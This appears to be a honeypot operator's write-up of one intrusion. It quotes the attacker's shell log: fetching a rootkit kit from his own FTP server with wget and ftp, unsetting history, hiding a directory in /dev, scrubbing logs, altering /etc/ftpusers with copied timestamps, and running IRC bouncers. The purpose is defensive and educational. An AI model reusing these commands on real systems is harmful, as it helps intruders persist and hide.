The third kiddie to enter my realm calls himself Cinder. He seems to be an Italian kiddo.

On July 7th, at 19:55, Cinder connects to port 21 of my honeypot. After running the 7530wurm exploit (see the page about MiCrobul) which gave him immediate root-access, he grabs a .tgz file from his ftp-space at interfree.it.

unset HISTFILE
w
12:30am up 4:55, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
cd /dev/
mkdir ".. cin"
cd ".. cin"
pwd
/dev/.. cin
wget ftp://CinderVII:CENSORED@213.158.72.39/akit.tar.gz
pwd
/dev/.. cin
ls
ftp 213.158.72.39
CinderVII
CENSORED
get akit.tar.gz
quit
tar zxvf akit.tar.gz
...

After untarring the kit he installs it with a simple ./install. It contains trojanned binaries 'crontab', 'df', 'dir', 'du', 'find', 'vdir', 'ifconfig', 'in.telnetd', 'killall', 'ls', 'netstat', 'ps', 'pstree', 'syslogd' and 'tcpd', a backdoor SSHD and the Adore kernel module.

'akit' stands for Akira kit, from the install:

# Hello.
# This rootkit it's very fast. That don't have a stealth backdoor..
# i dedicated this rootkit to akira my very best friends for now....
# for now, why i don't never have best frined's...
# sorry for my bad english...i don't study at school :P
#
# 15 may 2002
# product Akira`
# write by master`

As you can see, it's just written a few months ago. I will put it online in a few days for your education. Anyway.. with this installed all his incoming telnets and ssh connections are invisible, as are his psybnc, eggdrop, dsniff, sshd, etc. Let's take a look at the logs I hide for him >:)

At 20:17, not much after cracking the box, Cinder connects to his backdoor sshd on port 20673:

[root@hostname /root]# unset HISTFILE
[root@hostname /root]# cd /dev/".. cin"
[root@hostname .. cin]# ls
akit akit.tar.gz ava cl illusion sysinfo
[root@hostname .. cin]# ./illusion 195
illusion (v6) - the mirror game

usage ./illusion <string/ip/user> <on/off>

[root@hostname .. cin]# ./illusion 195 on

First, he hides his tracks, by unsetting the shell's history and using 'illusion'. Illusion is a shellscript which cleans logs. So Cinder cleaned all the logged lines containing '195'. After covering his tracks he checks if his connection and processes are hidden:

[root@hostname .. cin]# netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 8 [ ] DGRAM 303 /dev/log
unix 0 [ ] DGRAM 5216
unix 0 [ ] DGRAM 4814
unix 0 [ ] DGRAM 532
unix 0 [ ] DGRAM 500
unix 0 [ ] DGRAM 443
unix 0 [ ] DGRAM 392
unix 0 [ ] DGRAM 326
unix 0 [ ] DGRAM 315

[root@hostname .. cin]# ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1120 68 ? S Jul07 0:04 init [3]
root 2 0.0 0.0 0 0 ? SW Jul07 0:00 [kflushd]
root 3 0.0 0.0 0 0 ? SW Jul07 0:02 [kupdate]
root 4 0.0 0.0 0 0 ? SW Jul07 0:00 [kpiod]
root 5 0.0 0.0 0 0 ? SW Jul07 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW< Jul07 0:00 [mdrecoveryd]
root 256 0.0 0.0 0 0 ? SW Jul07 0:00 [lockd]
root 257 0.0 0.0 0 0 ? SW Jul07 0:00 [rpciod]
root 266 0.0 0.0 1156 0 ? SW Jul07 0:00 [rpc.statd]
root 280 0.0 0.0 1104 0 ? SW Jul07 0:00 [apmd]
root 331 0.0 0.2 1172 336 ? S Jul07 0:00 syslogd -m 0
root 340 0.0 0.1 1500 172 ? S Jul07 0:00 klogd
...

No kiddo can ever hack a box without installing some IRC-related programs. Cinder just neeeeds his eggdrops.

[root@hostname .. cin]# wget ftp://CinderVII:CENSORED@213.158.72.39/eggdrop1.6.2.tar.gz
bash: wget: command not found
[root@hostname .. cin]# lynx ftp://CinderVII:CENSORED@213.158.72.39/eggdrop1.6.2.tar.gz
...

After configuring the just-downloaded eggdrop he tries to run it:

[root@hostname eggdrop1.6.2] # ./eggdrop -m eggdrop2
./eggdrop: error in loading shared libraries: libtcl.so: cannot open shared object file: No such file or directory

Too bad dude, no tcl around. No worries for Cinder, he continues his siege, just as if the eggdrop was running fine. Not that running eggdrops has high priority when wu-ftpd is still vulnerable.

[root@hostname eggdrop1.6.2]# cd ..
[root@hostname .. cin]# cp -f /etc/ftpusers /dev/ftppatch
[root@hostname .. cin]# echo "ftp" >>/dev/ftppatch
[root@hostname .. cin]# echo "anonymous" >>/dev/ftppatch
[root@hostname .. cin]# touch -acmr /etc/ftpusers /dev/ftppatch
[root@hostname .. cin]# mv -f /dev/ftppatch /etc/ftpusers
[root@hostname .. cin]#
[root@hostname .. cin]#
[root@hostname .. cin]#
[root@hostname .. cin]# ls
akit akit.tar.gz ava cl eggdrop1.6.2 eggdrop1.6.2.tar.gz illusion sysinfo
[root@hostname .. cin]# cd akit
[root@hostname akit]# ls
bin install.patch.fr install.patch.rpmfind logo
install install.patch.fr2 install.patch.speakeasy patchssh
[root@hostname akit]# ./install.patch.rpmfind
Retrieving ftp://194.199.20.114/linux/redhat/updates/6.1/en/os/i386/wu-ftpd-2.6.0-14.6x.i386.rpm
wu-ftpd ##################################################
Retrieving ftp://194.199.20.114/linux/redhat/6.2/en/os/i386/RedHat/RPMS/imap-4.7-5.i386.rpm
imap ##################################################
Retrieving ftp://194.199.20.114/linux/redhat/updates/6.2/en/os/i386/bind-8.2.3-0.6.x.i386.rpm
bind ##################################################
[root@hostname akit]# ./patchssh
which: no sshd1 in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/bin)
which: no sshd in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/bin)

How nice, he fixes my broken wu-ftpd. I should be very thankful for that. No sshd, imapd or bind to patch though. Anyway, now he's save. Time to install psybnc!

[root@hostname .. cin]# lynx ftp://CinderVII:CENSORED@213.158.72.39/psyBNC2.2.1-linux-i86-static.tar.gz
...
[root@hostname .. cin]# tar zxvf psyBNC2.2.1-linux-i86-static.tar.gz
...
[root@hostname .. cin]# cd psybnc
[root@hostname psybnc]# ls
CHANGES COPYING FAQ Makefile README TODO help log menuconf motd psybnc psybncchk scripts tools
[root@hostname psybnc]# make
Running Conversion-Tool for older psyBNC-Versions.
This is a precompiled linux-glibc2 static version of psybnc.
-rwxrwxr-x 1 root root 533616 Oct 28 2000 psybnc
done.

[root@hostname psybnc]# pico psybnc.conf
...
[root@hostname psybnc]# ./psybnc
...

Well.. that's that. A running psybnc connected to IRCnet. The channel he's on seems to be a private channel where he stores his bouncers and eggdrops. Mighty useful if you ask me. Ofcourse he needs to check out if his new cracked box can run mirkforces too. Well, sorry, it won't work. First, I don't forward incoming packets for any other addresses in the honeypot's subnet. Secondly, my ISP's router won't even know those extra 252 ip's are there, since the box is on my LAN. Third, I firewall.

It's July 8th, 17:36 CEST now, I just read the mail abuse@interfree.it sent me as a reply to my abuse-mail about Cinder's hacking tools stored on their FTP. This was the reply:

(sorry for my poor english)

This user has been removed.

Distinti Saluti
Interfree SpA

Let's hope he doesn't have a backup :)

... I've put up a page which explains some tools Cinder uses. It takes a lot of time to 'analyse' them, so there's not much to see just now. But anyway, here's the page, have fun.

(July 15th, 20:47 CEST. Just a note that I'm still updating the explanation of Cinder's tools. You can see some stuff about a rootkit for IRIX there now, as well as other things. I also got a mail back from Cinder's ISP. I quote: due disciplinary measures about our customer are on the way. )

(July 15th, 23:40 CEST. Wrote a little explanation about edenkitbsd.tar.gz).

I think honeypot 2 was a success. I got hold of many tools the standard scriptkiddie uses, pestered the kiddo a bit, had fun. I think the explanations you can read on this page may be useful for those who don't know much about how kiddies operate. Besides that, I wasn't able to find much info on google about the kits I explained. This means that I might well be the first to explain them. Not that I want to be the first to boost my ego, no, it might be useful for other people to learn and do something with that knowledge. With simple counter-measures this hack would be easily detected. Now if only all sysadmins had some clue..